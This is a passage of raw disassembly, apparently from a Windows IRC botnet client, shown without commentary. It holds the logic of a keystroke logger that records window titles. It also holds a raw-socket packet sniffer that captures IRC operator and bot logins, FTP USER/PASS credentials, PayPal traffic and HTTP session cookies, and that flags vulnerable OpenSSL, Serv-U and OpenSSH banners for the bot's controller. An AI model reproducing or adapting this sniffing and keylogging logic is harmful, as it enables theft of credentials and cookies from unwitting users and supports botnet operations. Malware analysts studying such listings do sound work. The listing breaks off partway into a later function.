loc_412A30: ; CODE XREF: sub_4126A7+379�j
lea eax, [ebp+Str]
push eax
lea eax, [ebp+Dst]
push eax
push offset a__S_l_Buffer_0 ; ".».%s.«. (Buffer full) (%s)"
jmp short loc_412AA6
; ---------------------------------------------------------------------------
loc_412A42: ; CODE XREF: sub_4126A7+360�j
cmp edi, 0Dh
jnz loc_412B04
lea eax, [ebp+Dst]
push eax ; Str
call _strlen
test eax, eax
pop ecx
jz loc_412B32
call dword_4CB958 ; GetForegroundWindow
lea ecx, [ebp+Str]
push 3Ch
push ecx
push eax
call dword_4CB970 ; GetWindowTextA
cmp [ebp+var_58], 0
jz short loc_412A96
lea eax, [ebp+Dst]
push eax
push offset a__S_l_Return ; ".».%s.«. (Return)"
loc_412A85: ; CODE XREF: sub_4126A7+387�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp short loc_412AB5
; ---------------------------------------------------------------------------
loc_412A96: ; CODE XREF: sub_4126A7+3D0�j
lea eax, [ebp+Str]
push eax
lea eax, [ebp+Dst]
push eax
push offset a__S_l_ReturnS ; ".».%s.«. (Return) (%s)"
loc_412AA6: ; CODE XREF: sub_4126A7+399�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 10h
loc_412AB5: ; CODE XREF: sub_4126A7+3ED�j
sub esp, 98h
lea eax, [ebp+Str]
lea esi, [ebp+var_E0]
push 26h
pop ecx
mov edi, esp
push eax ; Str
lea eax, [ebp+Dest]
rep movsd
push eax ; int
call sub_4125FC
mov [ebp+arg_0], eax
push ebx ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0ACh
lea eax, [ebp+Dest]
push ebx ; Size
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
jmp short loc_412B32
; ---------------------------------------------------------------------------
loc_412B04: ; CODE XREF: sub_4126A7+39E�j
cmp esi, 1
jz short loc_412B1D
cmp esi, 3
jz short loc_412B1D
cmp esi, 2
jz short loc_412B18
cmp esi, 4
jnz short loc_412B32
loc_412B18: ; CODE XREF: sub_4126A7+46A�j
push [ebp+var_4]
jmp short loc_412B24
; ---------------------------------------------------------------------------
loc_412B1D: ; CODE XREF: sub_4126A7+460�j
; sub_4126A7+465�j
mov eax, [ebp+var_4]
add eax, 7
push eax ; Source
loc_412B24: ; CODE XREF: sub_4126A7+474�j
lea eax, [ebp+Dst]
push eax ; Dest
call _strcat
pop ecx
pop ecx
loc_412B32: ; CODE XREF: sub_4126A7+2C9�j
; sub_4126A7+2F4�j ...
add [ebp+var_4], 14h
cmp [ebp+var_4], offset dword_436B7C
jl loc_41292C
cmp [ebp+arg_0], 0
jz loc_412702
push [ebp+var_DC]
call sub_40B6D6
pop ecx
push 0
call ds:dword_4270D4 ; ExitThread
sub_4126A7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412B61 proc near ; DATA XREF: sub_401ACD+4150�o
var_102B4 = byte ptr -102B4h
var_102AB = byte ptr -102ABh
var_102A8 = dword ptr -102A8h
var_102A0 = dword ptr -102A0h
var_10293 = byte ptr -10293h
Str = byte ptr -1028Ch
Dest = byte ptr -2B4h
var_B4 = dword ptr -0B4h
var_B0 = byte ptr -0B0h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = byte ptr -20h
Dst = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 102B4h
call __alloca_probe
mov edx, [ebp+arg_0]
push esi
push edi
push 1
pop eax
mov esi, edx
push 25h
lea edi, [ebp+var_B4]
pop ecx
mov [ebp+var_8], eax
rep movsd
mov [edx+90h], eax
xor esi, esi
push 10h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push esi
call dword_4CB9D4 ; htons
push [ebp+var_B4]
mov [ebp+var_1A], ax
call sub_40AA06
pop ecx
push eax
call dword_4CBA14 ; inet_addr
push esi
push 3
push 2
mov [ebp+var_18], eax
call dword_4CBA54 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jnz short loc_412C36
call dword_4CB968 ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset asc_43759C ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_28], esi
jnz short loc_412C19
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+var_B0]
push eax ; Str
push [ebp+var_B4] ; int
call sub_409869
add esp, 14h
loc_412C19: ; CODE XREF: sub_412B61+96�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
push [ebp+var_30]
call sub_40B6D6
pop ecx
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
loc_412C36: ; CODE XREF: sub_412B61+76�j
mov eax, [ebp+var_30]
push 10h
imul eax, 234h
mov dword_43E91C[eax], edi
lea eax, [ebp+Dst]
push eax
push edi
call dword_4CBA00 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_412CBB
call dword_4CB968 ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset asc_437570 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_28], esi
jnz short loc_412C97
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+var_B0]
push eax ; Str
push [ebp+var_B4] ; int
call sub_409869
add esp, 14h
loc_412C97: ; CODE XREF: sub_412B61+114�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
pop ecx
push edi
call dword_4CBA6C ; closesocket
push [ebp+var_30]
call sub_40B6D6
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
loc_412CBB: ; CODE XREF: sub_412B61+F4�j
push esi
lea eax, [ebp+var_20]
push esi
push eax
push esi
push esi
lea eax, [ebp+var_8]
push 4
push eax
push 98000001h
push edi
call dword_4CB980 ; WSAIoctl
cmp eax, 0FFFFFFFFh
jnz short loc_412D3E
call dword_4CB968 ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset asc_437540 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_28], esi
jnz short loc_412D1A
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+var_B0]
push eax ; Str
push [ebp+var_B4] ; int
call sub_409869
add esp, 14h
loc_412D1A: ; CODE XREF: sub_412B61+197�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
pop ecx
push edi
call dword_4CBA6C ; closesocket
push [ebp+var_30]
call sub_40B6D6
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
loc_412D3E: ; CODE XREF: sub_412B61+177�j
push ebx
mov ebx, offset a_login ; ":.login"
loc_412D44: ; CODE XREF: sub_412B61+21B�j
; sub_412B61+22D�j ...
mov edi, 0FFFFh
lea eax, [ebp+var_102B4]
push edi ; Size
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_102B4]
push esi
push edi
push eax
push [ebp+var_4]
call dword_4CB9EC ; recv
cmp eax, 0FFFFFFFFh
jz loc_412E71
cmp [ebp+var_102AB], 6
jnz short loc_412D44
mov eax, [ebp+var_102A8]
cmp [ebp+var_10293], 18h
mov [ebp+var_C], eax
jnz short loc_412D44
lea eax, [ebp+Str]
push offset aPsniff_0 ; "[PSNIFF]"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412D44
lea eax, [ebp+Str]
push offset asc_437524 ; "-"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412D44
mov eax, ebx
xor edi, edi
test eax, eax
jz loc_412D44
mov [ebp+arg_0], ebx
loc_412DCD: ; CODE XREF: sub_412B61+287�j
push eax ; SubStr
lea eax, [ebp+Str]
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412DEF
inc edi
add [ebp+arg_0], 18h
mov eax, [ebp+arg_0]
jnz short loc_412DCD
jmp loc_412D44
; ---------------------------------------------------------------------------
loc_412DEF: ; CODE XREF: sub_412B61+27D�j
lea eax, [ebp+Str]
push eax
push [ebp+var_102A0]
call dword_4CB904 ; htons
movzx eax, ax
push eax
push [ebp+var_C]
call dword_4CBA60 ; inet_ntoa
push eax
lea eax, [edi+edi*2]
mov eax, dword_436C6C[eax*8]
push off_436C48[eax*4]
lea eax, [ebp+Dest]
push offset asc_4374F0 ; "-"
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 1Ch
cmp [ebp+var_28], esi
jnz short loc_412E5F
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+var_B0]
push eax ; Str
push [ebp+var_B4] ; int
call sub_409869
add esp, 14h
loc_412E5F: ; CODE XREF: sub_412B61+2DC�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
pop ecx
jmp loc_412D44
; ---------------------------------------------------------------------------
loc_412E71: ; CODE XREF: sub_412B61+20E�j
call dword_4CB968 ; WSAGetLastError
push eax
push offset asc_4374C4 ; "-"
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
cmp [ebp+var_28], esi
pop ebx
jnz short loc_412EB7
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+var_B0]
push eax ; Str
push [ebp+var_B4] ; int
call sub_409869
add esp, 14h
loc_412EB7: ; CODE XREF: sub_412B61+334�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
pop ecx
push [ebp+var_4]
call dword_4CBA6C ; closesocket
push [ebp+var_30]
call sub_40B6D6
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
sub_412B61 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_412EDD proc near ; CODE XREF: sub_4131EC+213�p
; sub_4131EC+239�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_4CE734, eax
mov eax, offset dword_4CE734
retn
sub_412EDD endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_412EEC(char *Str)
sub_412EEC proc near ; CODE XREF: sub_4131EC+2BF�p
Str = dword ptr 4
push esi
mov esi, [esp+4+Str]
push offset aBotSniff ; "Bot sniff"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_412F06
loc_412F02: ; CODE XREF: sub_412EEC+29�j
; sub_412EEC+3A�j ...
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_412F06: ; CODE XREF: sub_412EEC+14�j
push offset aFaak ; "#FAAK#"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412F02
push offset aPsniff_1 ; "[PSNIFF]:"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412F02
push offset aPsniff_2 ; "PSNIFF//"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412F02
push offset aJoin_0 ; "JOIN #"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_412F4E
loc_412F4A: ; CODE XREF: sub_412EEC+71�j
; sub_412EEC+82�j ...
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_412F4E: ; CODE XREF: sub_412EEC+5C�j
; DATA XREF: .data:off_43ACE0�o
push offset a302 ; "302 "
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412F4A
push offset a366 ; "366 "
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412F4A
push offset a_login_0 ; ":.login"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412F4A
push offset aLogin ; ":!login"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412F4A
push offset aLogin_0 ; ":!Login"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412F4A
push offset a_login_1 ; ":.Login"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412F4A
push offset a_ident ; ":.ident"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412F4A
push offset aIdent_0 ; ":!ident"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz loc_412F4A
push offset a_hashin ; ":.hashin"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz loc_412F4A
push offset aHashin ; ":!hashin"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_412EEC endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_413003(char *Str)
sub_413003 proc near ; CODE XREF: sub_4131EC+2F8�p
Str = dword ptr 4
push esi
mov esi, [esp+4+Str]
push offset aIrcSniff ; "IRC sniff"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_41301D
loc_413019: ; CODE XREF: sub_413003+29�j
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_41301D: ; CODE XREF: sub_413003+14�j
push offset aFaak ; "#FAAK#"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_413019
push offset aOper ; "OPER "
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_413043
loc_41303F: ; CODE XREF: sub_413003+4F�j
; sub_413003+60�j
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_413043: ; CODE XREF: sub_413003+3A�j
push offset aNick_1 ; "NICK "
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_41303F
push offset aOper_0 ; "oper "
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_41303F
push offset aYouAreNowAnIrc ; "You are now an IRC Operator"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_413003 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_413079(char *Str)
sub_413079 proc near ; CODE XREF: sub_4131EC+32E�p
Str = dword ptr 4
push esi
mov esi, [esp+4+Str]
push offset aFtpSniff ; "FTP sniff"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_413093
loc_41308F: ; CODE XREF: sub_413079+29�j
; sub_413079+3A�j
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_413093: ; CODE XREF: sub_413079+14�j
push offset aFaak ; "#FAAK#"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_41308F
push offset aNick_1 ; "NICK "
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_41308F
push offset a220 ; "220 "
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_4130CA
loc_4130C6: ; CODE XREF: sub_413079+60�j
; sub_413079+71�j
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_4130CA: ; CODE XREF: sub_413079+4B�j
push offset a230 ; "230 "
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_4130C6
push offset aUser_2 ; "USER "
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_4130C6
push offset aPass_0 ; "PASS "
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_413079 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_413100(char *Str)
sub_413100 proc near ; CODE XREF: sub_4131EC+35F�p
Str = dword ptr 4
push esi
mov esi, [esp+4+Str]
push offset aHttpSniff ; "HTTP sniff"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_41311A
loc_413116: ; CODE XREF: sub_413100+29�j
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_41311A: ; CODE XREF: sub_413100+14�j
push offset aFaak ; "#FAAK#"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_413116
push offset aPaypal ; "paypal"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_413140
loc_41313C: ; CODE XREF: sub_413100+4F�j
; sub_413100+60�j ...
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_413140: ; CODE XREF: sub_413100+3A�j
push offset aPaypal_0 ; "PAYPAL"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_41313C
push offset aPaypal_com ; "PAYPAL.COM"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_41313C
push offset aPaypal_com_0 ; "paypal.com"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_41313C
push offset aSetCookie ; "Set-Cookie:"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_413100 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_413187(char *Str)
sub_413187 proc near ; CODE XREF: sub_4131EC:loc_4135B1�p
Str = dword ptr 4
push esi
mov esi, [esp+4+Str]
push offset aVulnSniff ; "VULN sniff"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_4131A1
loc_41319D: ; CODE XREF: sub_413187+29�j
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_4131A1: ; CODE XREF: sub_413187+14�j
push offset aFaak ; "#FAAK#"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_41319D
push offset aOpenssl0_9_6 ; "OpenSSL/0.9.6"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_4131C7
loc_4131C3: ; CODE XREF: sub_413187+4F�j
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_4131C7: ; CODE XREF: sub_413187+3A�j
push offset aServUFtpServer ; "Serv-U FTP Server"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_4131C3
push offset aOpenssh_2 ; "OpenSSH_2"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_413187 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4131EC proc near ; DATA XREF: sub_401ACD+42A0�o
Dst = byte ptr -113B8h
var_113AF = byte ptr -113AFh
var_113AC = dword ptr -113ACh
var_113A8 = dword ptr -113A8h
var_113A4 = dword ptr -113A4h
Str = byte ptr -1138Ch
var_13B8 = byte ptr -13B8h
var_BB8 = byte ptr -0BB8h
var_3B8 = byte ptr -3B8h
var_3B7 = byte ptr -3B7h
Dest = byte ptr -2B8h
var_B8 = dword ptr -0B8h
var_B4 = byte ptr -0B4h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 113B8h
call __alloca_probe
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 25h
mov esi, eax
pop ecx
lea edi, [ebp+var_B8]
rep movsd
push 1
xor ebx, ebx
pop esi
lea edi, [ebp+var_3B7]
push 3Fh
mov [eax+90h], esi
pop ecx
xor eax, eax
mov [ebp+var_3B8], bl
push 0FFh
rep stosd
stosw
lea eax, [ebp+var_3B8]
mov [ebp+var_20], 2
push eax
mov [ebp+var_1E], bx
mov [ebp+var_1C], ebx
call dword_4CB9E8 ; gethostname
lea eax, [ebp+var_3B8]
push eax
call dword_4CBA58 ; gethostbyname
movsx ecx, word ptr [eax+0Ah]
mov eax, [eax+0Ch]
push ecx ; Size
push dword ptr [eax] ; Src
lea eax, [ebp+var_8]
push eax ; Dst
call _memcpy
mov eax, [ebp+var_8]
add esp, 0Ch
mov [ebp+var_1C], eax
push ebx
push 3
push 2
call dword_4CBA54 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_10], edi
jnz short loc_413292
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_413292: ; CODE XREF: sub_4131EC+9B�j
lea eax, [ebp+var_20]
push 10h
push eax
push edi
call dword_4CBA00 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_413308
call dword_4CB968 ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset asc_437870 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_2C], ebx
jnz short loc_4132E4
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_30] ; int
push eax ; int
lea eax, [ebp+var_B4]
push eax ; Str
push [ebp+var_B8] ; int
call sub_409869
add esp, 14h
loc_4132E4: ; CODE XREF: sub_4131EC+D6�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
pop ecx
push edi
call dword_4CBA6C ; closesocket
push [ebp+var_34]
call sub_40B6D6
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
loc_413308: ; CODE XREF: sub_4131EC+B6�j
push ebx
lea eax, [ebp+var_24]
push ebx
push eax
push ebx
push ebx
lea eax, [ebp+var_C]
push 4
push eax
push 98000001h
push edi
mov [ebp+var_C], esi
call dword_4CB980 ; WSAIoctl
cmp eax, 0FFFFFFFFh
jnz short loc_41338E
call dword_4CB968 ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset asc_437840 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_2C], ebx
jnz short loc_41336A
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_30] ; int
push eax ; int
lea eax, [ebp+var_B4]
push eax ; Str
push [ebp+var_B8] ; int
call sub_409869
add esp, 14h
loc_41336A: ; CODE XREF: sub_4131EC+15C�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
pop ecx
push edi
call dword_4CBA6C ; closesocket
push [ebp+var_34]
call sub_40B6D6
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
loc_41338E: ; CODE XREF: sub_4131EC+13C�j
mov esi, 200h
loc_413393: ; CODE XREF: sub_4131EC+1D6�j
; sub_4131EC+1FB�j ...
mov edi, 0FFFFh
lea eax, [ebp+Dst]
push edi ; Size
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Dst]
push ebx
push edi
push eax
push [ebp+var_10]
call dword_4CB9EC ; recv
cmp [ebp+var_113AF], 6
jnz short loc_413393
push [ebp+var_113A4]
mov edi, ds:dword_4271CC
call edi ; htons
push [ebp+var_113A4+2]
movzx eax, ax
mov [ebp+arg_0], eax
call edi ; htons
cmp [ebp+arg_0], 6Eh
movzx edi, ax
jz short loc_413393
cmp [ebp+arg_0], 19h
jz short loc_413393
cmp edi, 6Eh
jz short loc_413393
cmp edi, 19h
jz short loc_413393
push [ebp+var_113AC]
call sub_412EDD
pop ecx
push dword ptr [eax]
call ds:dword_4271D0 ; inet_ntoa
push eax
lea eax, [ebp+var_13B8]
push offset aS_6 ; "%s"
push eax ; Dest
call _sprintf
push [ebp+var_113A8]
call sub_412EDD
add esp, 10h
push dword ptr [eax]
call ds:dword_4271D0 ; inet_ntoa
push eax
lea eax, [ebp+var_BB8]
push offset aS_6 ; "%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Str]
mov [ebp+var_4], ebx
push eax ; Str
call _strlen
add esp, 10h
test eax, eax
jle short loc_413491
loc_41345D: ; CODE XREF: sub_4131EC+2A3�j
mov eax, [ebp+var_4]
cmp [ebp+eax+Str], 0Dh
lea eax, [ebp+eax+Str]
jnz short loc_413474
mov byte ptr [eax], 20h
loc_413474: ; CODE XREF: sub_4131EC+283�j
cmp byte ptr [eax], 0Ah
jnz short loc_41347C
mov byte ptr [eax], 20h
loc_41347C: ; CODE XREF: sub_4131EC+28B�j
inc [ebp+var_4]
lea eax, [ebp+Str]
push eax ; Str
call _strlen
cmp [ebp+var_4], eax
pop ecx
jl short loc_41345D
loc_413491: ; CODE XREF: sub_4131EC+26F�j
cmp [ebp+arg_0], 50h
jz loc_413544
cmp edi, 50h
jz loc_413544
lea eax, [ebp+Str]
push eax ; Str
call sub_412EEC
test al, al
pop ecx
jz short loc_4134D8
lea eax, [ebp+Str]
push eax
lea eax, [ebp+var_BB8]
push edi
push eax
push [ebp+arg_0]
lea eax, [ebp+var_13B8]
push eax
push offset unk_43780C
jmp loc_413573
; ---------------------------------------------------------------------------
loc_4134D8: ; CODE XREF: sub_4131EC+2C7�j
cmp edi, 50h
jz short loc_413544
lea eax, [ebp+Str]
push eax ; Str
call sub_413003
test al, al
pop ecx
jz short loc_41350E
lea eax, [ebp+Str]
push eax
lea eax, [ebp+var_BB8]
push edi
push eax
push [ebp+arg_0]
lea eax, [ebp+var_13B8]
push eax
push offset unk_4377D8
jmp short loc_413573
; ---------------------------------------------------------------------------
loc_41350E: ; CODE XREF: sub_4131EC+300�j
cmp edi, 50h
jz short loc_413544
lea eax, [ebp+Str]
push eax ; Str
call sub_413079
test al, al
pop ecx
jz short loc_413544
lea eax, [ebp+Str]
push eax
lea eax, [ebp+var_BB8]
push edi
push eax
push [ebp+arg_0]
lea eax, [ebp+var_13B8]
push eax
push offset unk_4377A4
jmp short loc_413573
; ---------------------------------------------------------------------------
loc_413544: ; CODE XREF: sub_4131EC+2A9�j
; sub_4131EC+2B2�j ...
lea eax, [ebp+Str]
push eax ; Str
call sub_413100
test al, al
pop ecx
lea eax, [ebp+Str]
push eax
jz short loc_4135B1
lea eax, [ebp+var_BB8]
push edi
push eax
lea eax, [ebp+var_13B8]
push [ebp+arg_0]
push eax
push offset asc_43776C ; "-"
loc_413573: ; CODE XREF: sub_4131EC+2E7�j
; sub_4131EC+320�j ...
lea eax, [ebp+Dest]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 20h
cmp [ebp+var_2C], ebx
jnz loc_413393
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_30] ; int
push eax ; int
lea eax, [ebp+var_B4]
push eax ; Str
push [ebp+var_B8] ; int
call sub_409869
add esp, 14h
jmp loc_413393
; ---------------------------------------------------------------------------
loc_4135B1: ; CODE XREF: sub_4131EC+36E�j
call sub_413187
test al, al
pop ecx
jz loc_413393
lea eax, [ebp+Str]
push eax
lea eax, [ebp+var_BB8]
push edi
push eax
push [ebp+arg_0]
lea eax, [ebp+var_13B8]
push eax
push offset unk_437734
jmp short loc_413573
sub_4131EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4135DF proc near ; DATA XREF: sub_401ACD+6464�o
Dest = byte ptr -494h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = dword ptr -28Ch
var_20C = byte ptr -20Ch
var_18C = dword ptr -18Ch
Str = byte ptr -10Ch
Str1 = byte ptr -8Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 494h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 0A5h
mov esi, eax
lea edi, [ebp+var_294]
rep movsd
mov dword ptr [eax+290h], 1
call ds:dword_4270B0 ; GetTickCount
push eax
call sub_41C2B8
lea eax, [ebp+var_18C]
push eax ; int
lea eax, [ebp+Str1]
push eax ; Str1
lea eax, [ebp+var_20C]
push eax ; Str
lea eax, [ebp+var_28C]
push eax ; int
call sub_4139CB
add esp, 14h
push eax
lea eax, [ebp+Dest]
push offset asc_43789C ; "-"
push eax ; Dest
call _sprintf
xor esi, esi
add esp, 0Ch
cmp [ebp+var_8], esi
jnz short loc_413672
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_294] ; int
call sub_409869
add esp, 14h
loc_413672: ; CODE XREF: sub_4135DF+71�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
push [ebp+var_290]
call sub_40B6D6
pop ecx
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
pop edi
pop esi
sub_4135DF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_413694(int,int,char *Str1,int,int)
sub_413694 proc near ; CODE XREF: sub_4139CB+40�p
var_284 = byte ptr -284h
Dest = byte ptr -0F4h
var_B4 = byte ptr -0B4h
var_B3 = byte ptr -0B3h
var_A0 = byte ptr -0A0h
var_94 = byte ptr -94h
Dst = byte ptr -8Ch
Src = dword ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6F = byte ptr -6Fh
var_6E = word ptr -6Eh
var_58 = word ptr -58h
var_56 = word ptr -56h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = byte ptr -34h
var_32 = word ptr -32h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_2A = word ptr -2Ah
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
Str1 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
